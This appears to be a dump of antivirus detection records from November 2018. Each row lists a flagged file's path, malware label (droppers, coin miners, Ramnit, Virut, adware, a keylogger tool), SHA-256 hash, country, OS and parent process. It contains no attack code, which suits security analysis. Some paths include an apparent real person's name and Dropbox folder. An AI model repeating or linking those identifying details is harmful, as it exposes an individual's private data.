  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:01:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T01:29:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151432-ea2c5fdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-151432-EA2C5FDD', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:14:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-112230-c088a056', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99e0155b\\AVSCAN-20181104-111741-9B8FE081\\AVSCAN-20181104-112230-C088A056', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:22:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075812-448037b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9446ec41\\AVSCAN-20181104-075426-83CE7E3D\\AVSCAN-20181104-075812-448037B6', filesize=2560000, name='TR/Dropper.Gen.#M1.#R1'), hash='5f6d91dc158563cdc7ff95397bffd5c02f5a48b3424dbfaf5e557e1bbfd7e2b0', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T06:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='00014153.exe', filepath='\\\\?\\D:\\KDR\\exe\\00014153.exe', filesize=320000, name='TR/Crypt.XPACK.Gen.#M300.#R2936'), hash='c561c544c1d7cb602729c620e38987acc5a87d0fce570324b3029ace36c9a7c9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:49:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d82a', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d82a', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:52:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='26c6990e060ac6408d69e1cab2b5d912b4e5289b92478028744a7c8e3d927bc5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:45:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T20:57:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='civ3conquestsedit.exe', filepath='F:\\Infogrames Interactive\\Civilization III\\Conquests\\Civ3ConquestsEdit.exe', filesize=1472000, name='W32/Almanahe.C.#M1.#R1'), hash='60eaca1925c7cb8b96eb4a00edd054d96ef1a47bb10589ca66c0c058b9757dc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015da24', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015da24', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202405-bf33d4d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a3c5ea9\\AVSCAN-20181104-202320-B4E62118\\AVSCAN-20181104-202405-BF33D4D3', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-235236-e1ca2961', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5c71a919\\AVSCAN-20181104-235218-DF477D8A\\AVSCAN-20181104-235236-E1CA2961', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:52:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noceduti.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7773631\\noceduti.exe', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline='\\\\\\/mhp \\\\\\/mds \\\\\\/mnt \\\\\\/ext:pilp \\\\\\/inst_loc=360,132,646,504 \\\\\\/RSF=636 \\\\\\/aflt=wnf_svcpyxoji_18_44_04 \\\\\\/instlref=s5  \\\\\\/noadmin \\\\\\/nochrome \\\\\\/adt=tE1L1R1V2Y1L1Qzuzy0CtAtDyD0B0F0AyC0EtCtAyCtAtCtCtTtE1L1R1V1B1Q2ZzutBtDtCzztCtCtDyEtCyByDzzyEzztCzzzztTtE1Q1G1Izu2Y1G1J1G1F2W1GtTtE1Q1G1I1M2YzuyD', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7773631\\noceduti.exe', parentsize=512000, timestamp='2018-11-04T19:59:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180059-ba595090', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae2d1c2\\AVSCAN-20181104-175508-7F3CD3B4\\AVSCAN-20181104-180059-BA595090', filesize=960000, name='ADWARE/iBryte.Gen7.#M1.#R1'), hash='3ea51a0c1d2331e16a49cd84bd57628930b5c0475abdc5fafd20c74b930b07a3', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:31:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\w3ogjzuxheq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:15:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nerodeltmp.exe', filepath='G:\\D_DISK\\soft\\gnral soft\\Nero\\Installation\\Setup\\NeroDelTmp.exe', filesize=1120000, name='TR/Patched.Ren.Gen.#M2.#R3369'), hash='26d83439edc27d47813b29ed9a2649e5e6e22e66daa19118e1e577917ef9ac3b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T09:49:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000867', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp00000867', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:52:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Tonic.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.btuqv.#M0.#R0'), hash='4769980682ab8e7efcccff847a70944b55c079ecac65d03059a9924eab9ebe31', metadata=Row(cmdline=None, country='FR', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:28:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c02b87b42fe667865584486dbbcf1d4019c4b859c9193fd4fcceb96ad3ce2b21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\C02B87B42FE667865584486DBBCF1D4019C4B859C9193FD4FCCEB96AD3CE2B21', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c02b87b42fe667865584486dbbcf1d4019c4b859c9193fd4fcceb96ad3ce2b21', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:13:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nipping.exe', filepath='\\\\?\\C:\\Windows\\nipping.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a72ac5f3d4fcb9fb4b89e7b8c81d9ed761cf150e32ff2fbc9bbd49ea15134bf8', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:07:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201849-99db4621', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-201807-925018B6\\AVSCAN-20181104-201849-99DB4621', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:18:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T14:15:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tasurrogate.exe', filepath='\\\\?\\D:\\TMP\\Temp2\\1\\ThinAppPortable\\TASurrogate.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='96fe54fba244c172b9cff7409f0516440c1831efd81ac26c66386fb8a839233a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rpcss.dll', filepath='\\\\?\\c:\\windows\\system32\\rpcss.dll', filesize=512000, name='TR/VB.65536.#M1.#R1'), hash='c5003f2c912c5ca990e634818d3b4fd72f871900af2948bd6c4d6400b354b401', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:41:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095349-645e15d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52e373a3\\AVSCAN-20181102-092201-B325F22F\\AVSCAN-20181102-095349-645E15D6', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:49:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uddi.htm', filepath='c:\\users\\X\\appdata\\local\\virtualstore\\program files (x86)\\microsoft visual studio 9.0\\common7\\packages\\1033\\uddi.htm', filesize=380000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='cd110664ab5cb0fc3939ff758aa49cad22a9f317203bd0c31664a540a23d025b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:02:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7FE6FA9B9E5E57ECBF4D8D1B82322641E77C0D325008DC0BBDD9CD705201B3FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:53:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a6702363.exe', filepath='g:\\system volume information\\_restore{c748380e-fdee-4ba8-ac02-d3f7afc441fe}\\rp1689\\A6702363.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='761a47c48a643614c2922c5a7809c64dd06d7caaddc45e060ae9b684506688d1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='client.exe', filepath='C:\\ProgramData\\Client\\client.exe', filesize=9000000, name='TR/Dropper.Gen.#M2.#R3322'), hash='7745746bba7ce1690b27dad90b72ef32a5c403d83ddbdddda1ab39e26b3c0768', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:52:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverquery.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\driverquery.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96f25ee77a87eda83cc41b471e698901aaa78954056ec35403055298a3d60d49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='9e80892a9fcd8f0dd799965683a187a8650f7ce21c653f7fbb36306a09096c4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-02T20:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capitulo[1].htm', filepath='C:\\Users\\X\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cache\\J3K42WWE\\capitulo[1].htm', filesize=52000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='d19bd7f2da863327e656b9ce93017b864026bf34275223203ca3de018cbba767', metadata=Row(cmdline='-ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdgeCP.exe', parentsize=237480, timestamp='2018-11-02T06:58:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installd.exe', filepath='C:\\Windows\\SysWOW64\\installd.exe', filesize=128000, name='ADWARE/Amonetize.ges.#M1.#R1'), hash='dbe316bd9fe59819848abf89caab1b764b33c6ffe65f880de8ca4700e974e3d6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='resmgr.exe', filepath='\\\\?\\C:\\Program Files\\VONE\\TopSecSV\\ResMgr.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:53:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rgnlwnvr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RGnlWnVR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-015530-ca28dc68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-015530-CA28DC68', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='ff686ddb38ece86bc825e748d0468f3a1518cf8a9d10c9c2bb56d87effd76329', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8F0B5617E5FA994482FAF617E7D5495D00674F7D8E92D1CDC31196E287C4E2F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100727-7c3df76d', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-095011-FCAF5B28\\AVSCAN-20181102-100727-7C3DF76D', filesize=576000, name='HEUR/AGEN.1015897.#M1.#R1'), hash='9cba9efa1a34fd885a32cacc7f6087c647a4d052b2422ca8b9e23bbeee4826d7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144220-06e1b728', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a37ebc11\\AVSCAN-20181102-144022-F2DA545B\\AVSCAN-20181102-144220-06E1B728', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065135-a2851eef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-065135-A2851EEF', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:55:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files (x86)\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='9f64f3b7f684d5557efbc40aa949b0dbf9dbccc36b662e5cc5b2fdc00058f20f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-02T17:32:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1dca02b2.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1dca02b2.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:07:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120018-c408ac7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db8b4e9e\\AVSCAN-20181102-115823-B8B7F1DA\\AVSCAN-20181102-120018-C408AC7E', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:29Z'), dt=datetime.date(2018, 11, 2)),
